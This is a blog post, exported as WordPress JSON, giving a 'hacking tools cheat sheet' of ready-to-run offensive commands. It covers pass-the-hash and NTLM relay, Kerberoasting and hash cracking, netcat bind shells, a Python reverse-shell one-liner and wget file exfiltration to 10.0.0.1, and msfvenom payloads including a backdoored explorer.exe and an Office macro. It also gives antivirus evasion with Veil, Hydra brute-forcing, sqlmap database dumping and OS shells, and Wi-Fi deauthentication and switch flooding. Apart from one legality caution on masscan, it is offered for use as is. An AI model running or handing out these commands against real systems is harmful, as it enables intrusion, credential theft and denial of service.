{"id":822,"date":"2021-01-27T21:28:44","date_gmt":"2021-01-27T21:28:44","guid":{"rendered":"https:\/\/dft.wiki\/?p=822"},"modified":"2026-06-09T13:13:29","modified_gmt":"2026-06-09T17:13:29","slug":"pentesting-tools","status":"publish","type":"post","link":"https:\/\/dft.wiki\/?p=822","title":{"rendered":"Hacking Tools Cheat Sheet #1"},"content":{"rendered":"<h5>Reference List<\/h5>\n<ol>\n<li style=\"list-style-type: none;\">\n<ol>\n<li><a href=\"#CrackMapExec\">CrackMapExec<\/a><\/li>\n<li><a href=\"#Responder\">Responder<\/a><\/li>\n<li><a href=\"#ntlmrelayx\">ntlmrelayx<\/a><\/li>\n<li><a href=\"#GPPDecrypt\">GPP-Decrypt<\/a><\/li>\n<li><a href=\"#GetUserSPNs\">GetUserSPNs<\/a><\/li>\n<li><a href=\"#HashCat64\">HashCat64<\/a><\/li>\n<li><a href=\"#HashCat\">HashCat<\/a><\/li>\n<li><a href=\"#NetCat\">NetCat<\/a><\/li>\n<li><a href=\"#VeilFramework\">Veil-Framework<\/a><\/li>\n<li><a href=\"#Mentalist\">Mentalist<\/a><\/li>\n<li><a href=\"#Cupp\">CUPP<\/a><\/li>\n<li><a href=\"#Skipfish\">Skipfish<\/a><\/li>\n<li><a href=\"#Grabber\">Grabber<\/a><\/li>\n<li><a href=\"#httrack\">Httrack<\/a><\/li>\n<li><a href=\"#Wafw00f\">Wafw00f<\/a><\/li>\n<li><a href=\"#Hydra\">Hydra<\/a><\/li>\n<li><a href=\"#pwInspector\">pw-Inspector<\/a><\/li>\n<li><a href=\"#MACof\">MACof<\/a><\/li>\n<li><a href=\"#Sublist3r\">Sublist3r<\/a><\/li>\n<li><a href=\"#Nessus\">Nessus<\/a><\/li>\n<li><a href=\"#XSSer\">XSSer<\/a><\/li>\n<li><a href=\"#SQLmap\">SQLmap<\/a><\/li>\n<li><a href=\"#DirBuster\">DirBuster<\/a><\/li>\n<li><a href=\"#MDK3\">MDK3<\/a><\/li>\n<li><a href=\"#Sherlock\">Sherlock<\/a><\/li>\n<li><a href=\"#MasScan\">MasScan<\/a><\/li>\n<\/ol>\n<\/li>\n<\/ol>\n<hr id=\"CrackMapExec\" \/>\n<p><strong>CrackMapExec<\/strong> is a post-exploitation tool that helps automate security assessments of large Active Directory networks. It automates login attempts across multiple computers in the network [<a href=\"https:\/\/github.com\/byt3bl33d3r\/CrackMapExec\">Link<\/a>].<\/p>\n<pre>sudo apt-get install crackmapexec -y<\/pre>\n<p>If you already have credentials:<\/p>\n<pre>crackmapexec smb 10.0.0.0\/24 -u Administrator -p 'Pa$$w0rd1!' -d WORKGROUP<\/pre>\n<p>If you only have the hash:<\/p>\n<pre>crackmapexec smb 10.0.0.0\/24 -u Administrator -H <strong>asd3b4...89c0<\/strong><\/pre>\n<p>Replace <strong>asd3b4&#8230;89c0<\/strong> with the full hash you obtained.<\/p>\n<hr id=\"Responder\" \/>\n<p><strong>Responder<\/strong> exploits SMB vulnerabilities [<a href=\"https:\/\/github.com\/SpiderLabs\/Responder\">Link<\/a>] (deprecated version also at [<a href=\"https:\/\/github.com\/SpiderLabs\/Responder\">Link<\/a>]).<\/p>\n<pre>locate Responder.py\r\ncd \/usr\/share\/responder\/\r\npython Responder.py -I eth0 -rdw -v<\/pre>\n<hr id=\"ntlmrelayx\" \/>\n<p><strong>ntlmrelayx<\/strong> relays a received NTLM hash to a target IP listed in target.txt, gaining access to SMB shares using someone else&#8217;s credentials.<\/p>\n<pre>locate ntlmrelayx.py\r\ncd \/opt\/impacket\/examples\r\npython ntlmrelayx.py -tf target.txt -smb2support<\/pre>\n<hr id=\"GPPDecrypt\" \/>\n<p><strong>GPP-Decrypt<\/strong> decrypts GPP passwords.<\/p>\n<pre>gpp-decrypt <strong>edBS...lVmQ<\/strong><\/pre>\n<p>Replace <strong>edBS&#8230;lVmQ<\/strong> with the encrypted GPP password string.<\/p>\n<hr id=\"GetUserSPNs\" \/>\n<p><strong>GetUserSPNs<\/strong> is part of a Kerberoast attack. It finds Service Principal Names associated with normal user accounts, which can then be used for an offline brute-force attack against the SPN account&#8217;s NTLM hash if valid TGS tickets can be obtained [<a href=\"https:\/\/github.com\/SecureAuthCorp\/impacket\">Link<\/a>].<\/p>\n<pre>python GetUserSPNs.py Domain\/User -dc-ip 10.0.0.1 -request\r\n\r\nPassword: *******<\/pre>\n<hr id=\"HashCat64\" \/>\n<p><strong>HashCat64<\/strong> is a powerful brute-force hash cracker, useful for cracking hashes obtained from GetUserSPNs or other sources [<a href=\"https:\/\/hashcat.net\/hashcat\/\">Link<\/a>].<\/p>\n<pre>hashcat64.exe --help\r\nhashcat64.exe -m 13100 kerberoast.txt rockyou.txt<\/pre>\n<hr id=\"HashCat\" \/>\n<p><strong>HashCat<\/strong> is a password cracker [<a href=\"https:\/\/hashcat.net\/hashcat\/\">Link<\/a>].<\/p>\n<pre>sudo apt install hashcat\r\nhashcat -m 5600 hash.txt rockyou.txt\r\nhashcat -m 5600 hash.txt rockyou.txt <strong>--force<\/strong>\r\nhashcat -I\r\nhashcat <strong>-d<\/strong> 1,2 <strong>-m 2500<\/strong> -w 3 --status <strong>-a 6 wpa2_handshake.hccapx<\/strong> wordlist.txt\r\nhashcat jwt.txt -m 16500 -a 0 rockyou.txt -r <strong>OneRuleToRuleThemAll.rule<\/strong><\/pre>\n<p>Note that the <strong>hash captured with Responder was copied to hash.txt<\/strong> and <strong>mode 5600 is for NetNTLMv2<\/strong>. Use <strong>&#8211;help<\/strong> to find the module that matches your hash type. The password list used here is <strong>rockyou.txt<\/strong>, but another popular option is <strong>BreachParse<\/strong>.<\/p>\n<p>The fourth line lists available CPUs and GPUs using <strong>-I<\/strong>, then specifies computing devices <strong>1<\/strong> and <strong>2<\/strong>, sets module <strong>2500<\/strong> for WPA\/WPA2, performance level <strong>3<\/strong> (1-4), and additional parameters.<\/p>\n<p>Get <strong>OneRuleToRuleThemAll<\/strong> from [<a href=\"https:\/\/raw.githubusercontent.com\/NotSoSecure\/password_cracking_rules\/master\/OneRuleToRuleThemAll.rule\">Link<\/a>].<\/p>\n<hr id=\"NetCat\" \/>\n<p><strong>NetCat<\/strong> is a tool for creating network-based functionality such as chat, file transfer, remote shell, port scanning, and more [<a href=\"https:\/\/nc110.sourceforge.io\/\">Link<\/a>].<\/p>\n<p>Server Side (Listener):<\/p>\n<pre>nc -nvlp 8080\r\nnc -n -v -l -p 5555 -e \/bin\/bash\r\nnc -n -v -l -p 5555 -e cmd.exe\r\nnc -l -p 1234 > receive.file<\/pre>\n<p>Client Side:<\/p>\n<pre>nc -nv 10.0.0.1 5555\r\nnc -zv domain.com 80-88\r\nnc -w 3 10.0.0.1 1234 < send.file<\/pre>\n<p>It can also be accessed via other tools:<\/p>\n<pre>wget --post-file=file.txt 10.0.0.1 8080\r\n\/bin\/bash -c '(while ! nc -z -v -w1 localhost 22 2>\/dev\/null; do echo \"Waiting for port 22 to open ...\"; sleep 2; done); sleep 2'<\/pre>\n<p>Getting a reverse shell with Python:<\/p>\n<pre>python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.0.0.1\",53));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"\/bin\/bash\",\"-i\"]);'<\/pre>\n<hr id=\"VeilFramework\" \/>\n<p><strong>Veil-Framework<\/strong> is a tool designed to generate Metasploit payloads that bypass common anti-virus solutions [<a href=\"https:\/\/github.com\/Veil-Framework\/Veil\">Link<\/a>].<\/p>\n<pre>git clone https:\/\/github.com\/Veil-Framework\/Veil.git\r\ncd Veil\/\r\n.\/config\/setup.sh --force --silent<\/pre>\n<hr \/>\n<p><strong>msfVenom<\/strong> is a framework for creating and encrypting payloads. Note on EXITFUNC values: thread (clean exit), process (restarts on exit), seh (restarts the process on error).<\/p>\n<pre>msfvenom -p windows\/shell_reverse_tcp LHOST=10.0.0.1 LPORT=4444 EXITFUNC=thread -f <strong>c<\/strong> -a <strong>x86<\/strong> -b \"<strong>\\x00<\/strong>\"<\/pre>\n<p>The first example creates a payload with file type '<strong>c<\/strong>', architecture <strong>32-bit<\/strong>, and excludes the bad character '<strong>\\x00<\/strong>'. Since no output file is specified, the shellcode is printed to the screen for copying.<\/p>\n<pre>msfvenom -p windows\/x64\/meterpreter\/reverse_http EXITFUNC=thread LPORT=4444 LHOST=10.0.0.1 -f <strong>raw<\/strong> -o <strong>payload.bin<\/strong> --<strong>smallest<\/strong><\/pre>\n<p>The second example sets the format to '<strong>raw<\/strong>', outputs to '<strong>payload.bin<\/strong>', and attempts to generate the smallest shellcode possible.<\/p>\n<pre>msfvenom -a x86 --platform Windows -p windows\/shell\/bind_tcp -e x86\/shikata_ga_nai -b '\\x00' -i <strong>3<\/strong> -f <strong>python<\/strong> -n <strong>26<\/strong><\/pre>\n<p>The third example creates a payload with <strong>3<\/strong> iterations of the '<strong>shikata_ga_nai<\/strong>' encoder, no null bytes, output in '<strong>python<\/strong>' format, and <strong>26<\/strong> NOPs prepended.<\/p>\n<pre>msfvenom -a x86 --platform windows -x <strong>explorer.exe<\/strong> -<strong>k<\/strong> -p windows\/shell\/bind_tcp lhost=10.0.0.1 -b \"\\x00\" -f exe -o <strong>explorer_backdoor.exe<\/strong><\/pre>\n<p>The fourth example takes an existing '<strong>explorer.exe<\/strong>' and uses '<strong>-k<\/strong>' to run the payload in a separate thread, outputting '<strong>explorer_backdoor.exe<\/strong>' with the appended payload.<\/p>\n<pre>msfvenom -p windows\/meterpreter\/reverse_tcp LHOST=<strong>eth0<\/strong> LPORT=4444 <strong>-f exe<\/strong> > shell.exe<\/pre>\n<p>The fifth example creates a Meterpreter reverse shell as an <strong>exe<\/strong>, letting msfvenom automatically resolve the IP of interface <strong>eth0<\/strong>.<\/p>\n<pre>msfvenom -p windows\/meterpreter\/reverse_tcp LHOST=eth0 LPORT=53 <strong>-f vba -o macro.vba<\/strong><\/pre>\n<p>The last example creates a macro for use with Microsoft Office tools.<\/p>\n<hr id=\"Mentalist\" \/>\n<p><strong>Mentalist<\/strong> creates password lists using rule sets and can also import existing lists such as CUPP's output [<a href=\"https:\/\/github.com\/sc0tfree\/mentalist\">Link<\/a>].<\/p>\n<pre>mentalist<\/pre>\n<hr id=\"Cupp\" \/>\n<p><strong>CUPP<\/strong> (Common User Passwords Profiler) generates a list of possible passwords based on information about the target and their associates, such as first names, last names, nicknames, and birthdates [<a href=\"https:\/\/github.com\/Mebus\/cupp\">Link<\/a>].<\/p>\n<pre>sudo python cupp.py -i<\/pre>\n<hr id=\"Skipfish\" \/>\n<p><strong>Skipfish<\/strong> is a website spider\/crawler that also tests for various vulnerable parameters and configurations.<\/p>\n<pre>skipfish -YO -o ~\/Desktop\/folder http:\/\/192.168.x.x<\/pre>\n<hr id=\"Grabber\" \/>\n<p><strong>Grabber<\/strong> is a spider\/crawler that tests for SQLi (SQL Injection) and XSS (Cross-Site Scripting).<\/p>\n<pre>grabber --spider 1 --sql --xss --url http:\/\/example.com<\/pre>\n<hr id=\"httrack\" \/>\n<p><strong>Httrack<\/strong> recursively downloads a website, creating a local mirror.<\/p>\n<pre>httrack http:\/\/example.com -O ~\/Desktop\/file<\/pre>\n<p>Note: the same can be done with wget. The default depth is 5; the example below sets it to 10:<\/p>\n<pre>wget -r -l <strong>10<\/strong> http:\/\/example.com<\/pre>\n<hr id=\"Wafw00f\" \/>\n<p><strong>Wafw00f<\/strong> detects the presence of a Web Application Firewall.<\/p>\n<pre>wafw00f http:\/\/example.com<\/pre>\n<hr id=\"Hydra\" \/>\n<p><strong>Hydra<\/strong> is a brute-force login cracker supporting numerous protocols: Asterisk, AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-POST, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTPS-POST, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, RTSP, SAP\/R3, SIP, SMB, SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC, and XMPP [<a href=\"https:\/\/github.com\/vanhauser-thc\/thc-hydra\">Link<\/a>].<\/p>\n<pre>hydra -l userName -P \/usr\/share\/wordlists\/metasploit\/unix_passwords.txt -t 5 10.0.0.1 ssh\r\nhydra -L users.lst -P \/usr\/share\/wordlists\/rockyou.txt ftp:\/\/10.0.0.1\r\nhydra -L usernames.txt -P passwords.txt 10.0.0.1 http-post-form '\/login.php:username=^USER^&password=^PASS^:F=incorrect' -v<\/pre>\n<p>The first example attempts to guess the password for <strong>userName<\/strong> using Metasploit's <strong>unix_passwords.txt<\/strong> list with <strong>5<\/strong> threads over <strong>SSH<\/strong>.<\/p>\n<p>The second example attempts to log in to an FTP server using a list of usernames and the rockyou wordlist.<\/p>\n<p>The third example targets an HTTP POST login form, supplying username and password lists and marking failed attempts by the word \"incorrect\" in the response.<\/p>\n<hr id=\"pwInspector\" \/>\n<p><strong>pw-Inspector<\/strong> filters a wordlist by password length criteria (from <strong>6<\/strong> to <strong>10<\/strong> characters in the example below).<\/p>\n<pre>pw-inspector -i whole_wordlist.txt -o filtered_list.txt -m 6 -M 10<\/pre>\n<hr id=\"MACof\" \/>\n<p><strong>MACof<\/strong> floods a switch with random MAC addresses.<\/p>\n<pre>macof\r\nmacof -n 100\r\nmacof -i eth0 -d 192.168.1.1 -y 80<\/pre>\n<hr id=\"Sublist3r\" \/>\n<p><strong>Sublist3r<\/strong> is a tool designed to <strong>passively<\/strong> enumerate subdomains of websites using OSINT [Link].<\/p>\n<pre>sublist3r -d example.com -t 5 -e bing<\/pre>\n<hr id=\"Nessus\" \/>\n<p><strong>Nessus<\/strong> is a powerful professional vulnerability scanner [<a href=\"https:\/\/www.tenable.com\/downloads\/\">Link<\/a>].<\/p>\n<pre>sudo systemctl start nessusd.service\r\nhttps:\/\/localhost:8834\/<\/pre>\n<hr id=\"XSSer\" \/>\n<p><strong>XSSer<\/strong> is an automated framework for detecting, exploiting, and reporting XSS vulnerabilities in web applications.<\/p>\n<pre>sudo apt install xsser\r\nxsser --gtk\r\n\r\nxsser --url \"http:\/\/127.0.0.1\/login.php\" -p \"user=<strong>XSS<\/strong>&password=secret\"\r\nxsser --url \"http:\/\/127.0.0.1\/login.php\" -p \"user=<strong>XSS<\/strong>&password=secret\" --auto\r\nxsser --url \"http:\/\/127.0.0.1\/login.php\" -p \"user=<strong>XSS<\/strong>&password=secret\" -Fp \"<script>alert('vulnerable!')<\/script>\"\r\nxsser --url \"http:\/\/127.0.0.1\/login.php?user=<strong>XSS<\/strong>&password=secret\"\r\nxsser --url \"http:\/\/127.0.0.1\/login.php?user=<strong>XSS<\/strong>&password=secret\" -Fp \"<script>alert('vulnerable!')<\/script>\"<\/pre>\n<p>Replace the value of the target parameter with <strong>XSS<\/strong> to tell XSSer where to inject payloads.<\/p>\n<hr id=\"SQLmap\" \/>\n<p><strong>SQLmap<\/strong> automates the detection and exploitation of SQL injection flaws and can take over database servers [<a href=\"http:\/\/sqlmap.org\/\">Link<\/a>].<\/p>\n<pre>sudo apt install <strong>sqlmap<\/strong>\r\n<strong>python<\/strong> sqlmap.py --help\r\nsqlmap <strong>-u<\/strong> \"https:\/\/example.com\/search.php?q=\"\r\nsqlmap -u \"https:\/\/example.com\/search.php?q=\" <strong>--level=5 --risk=3<\/strong>\r\nsqlmap -u \"https:\/\/example.com\/search.php?q=\" <strong>--dbs --all --threads=10<\/strong>\r\nsqlmap <strong>--url=<\/strong>\"https:\/\/example.com\/login.php\" <strong>--data<\/strong>=\"user=test&password=test\"\r\nsqlmap -u \"https:\/\/example.com\/search.php?q=\" <strong>--batch --banner<\/strong>\r\nsqlmap -u \"https:\/\/example.com\/search.php?q=\" --batch <strong>--passwords<\/strong>\r\nsqlmap -u \"https:\/\/example.com\/search.php?q=\" --batch <strong>--dbs<\/strong>\r\nsqlmap -u \"https:\/\/example.com\/search.php?q=\" --batch <strong>--tables -D dbName<\/strong>\r\nsqlmap -u \"https:\/\/example.com\/search.php?q=\" --batch <strong>--dump -T tableName -D dbName<\/strong>\r\nsqlmap -u \"https:\/\/example.com\/search.php?q=\" --batch <strong>--os-shell<\/strong>\r\n<\/pre>\n<p>Note the <strong>level<\/strong> (1-5) and <strong>risk<\/strong> (1-3) settings for test intensity, <strong>dbs<\/strong> for listing database names, <strong>all<\/strong> for retrieving everything, and <strong>threads<\/strong> (1-10) for faster execution. The <strong>data<\/strong> argument provides POST variables.<\/p>\n<hr id=\"DirBuster\" \/>\n<p><strong>DirBuster<\/strong> is designed to brute-force directory and file names on web\/application servers.<\/p>\n<pre>dirb https:\/\/example.com\/\r\ndirb https:\/\/example.com\/ wordslist.txt\r\n\r\nOR\r\n\r\n# also available with GUI<\/pre>\n<hr id=\"MDK3\" \/>\n<p><strong>MDK3<\/strong> exploits common Wi-Fi weaknesses, including brute-forcing hidden SSIDs, beacon flooding, authentication DoS, deauthentication, WPA downgrade, continuous traffic cancellation, stress testing, and more.<\/p>\n<pre>sudo apt install mdk3\r\nsudo mdk3 wlan0mon a\r\nsudo mdk3 wlan0mon d -c <strong>6<\/strong> -b <strong>mac_list.txt<\/strong>\r\nsudo mdk3 wlan0mon p -t <strong>00:00:00:00:00:00<\/strong> -f <strong>ssid_list.txt<\/strong><\/pre>\n<p>Note: the third line floods channel <strong>6<\/strong> with deauthentication messages using <strong>mac_list.txt<\/strong>. On the fourth line, replace <strong>00:00:00:00:00:00<\/strong> with the MAC address of the access point hosting the hidden SSID, and <strong>ssid_list.txt<\/strong> with the wordlist for brute-forcing.<\/p>\n<hr id=\"Sherlock\" \/>\n<p><strong>Sherlock<\/strong> is an OSINT tool that searches for social media accounts matching a given username [<a href=\"https:\/\/github.com\/sherlock-project\/sherlock\">Link<\/a>].<\/p>\n<pre>sudo apt install sherlock\r\nsherlock --timeout 1 username<\/pre>\n<hr id=\"MasScan\" \/>\n<p><strong>MasScan<\/strong> is a mass scanner powerful enough to scan the entire Internet. Use it carefully as scanning unauthorized networks is illegal [<a href=\"https:\/\/github.com\/robertdavidgraham\/masscan\">Link<\/a>].<\/p>\n<pre>masscan 0.0.0.0\/0 --port 12345 --rate 1000000 -oX <strong>output.txt<\/strong> --exclude <strong>private_networks.txt<\/strong><\/pre>\n<p>The <strong>output.txt<\/strong> file will be in XML format. The exclude argument prevents scanning non-public network ranges. See <strong>private_networks.txt<\/strong> below:<\/p>\n<pre>10.0.0.0\/8\r\n172.16.0.0\/12\r\n192.168.0.0\/16<\/pre>\n","protected":false},"excerpt":{"rendered":"<p>Reference List CrackMapExec Responder ntlmrelayx GPP-Decrypt GetUserSPNs HashCat64 HashCat NetCat Veil-Framework Mentalist CUPP Skipfish Grabber [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[9],"tags":[],"class_list":["post-822","post","type-post","status-publish","format-standard","hentry","category-hacking"],"_links":{"self":[{"href":"https:\/\/dft.wiki\/index.php?rest_route=\/wp\/v2\/posts\/822","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/dft.wiki\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/dft.wiki\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/dft.wiki\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/dft.wiki\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=822"}],"version-history":[{"count":61,"href":"https:\/\/dft.wiki\/index.php?rest_route=\/wp\/v2\/posts\/822\/revisions"}],"predecessor-version":[{"id":5795,"href":"https:\/\/dft.wiki\/index.php?rest_route=\/wp\/v2\/posts\/822\/revisions\/5795"}],"wp:attachment":[{"href":"https:\/\/dft.wiki\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=822"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/dft.wiki\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=822"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/dft.wiki\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=822"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}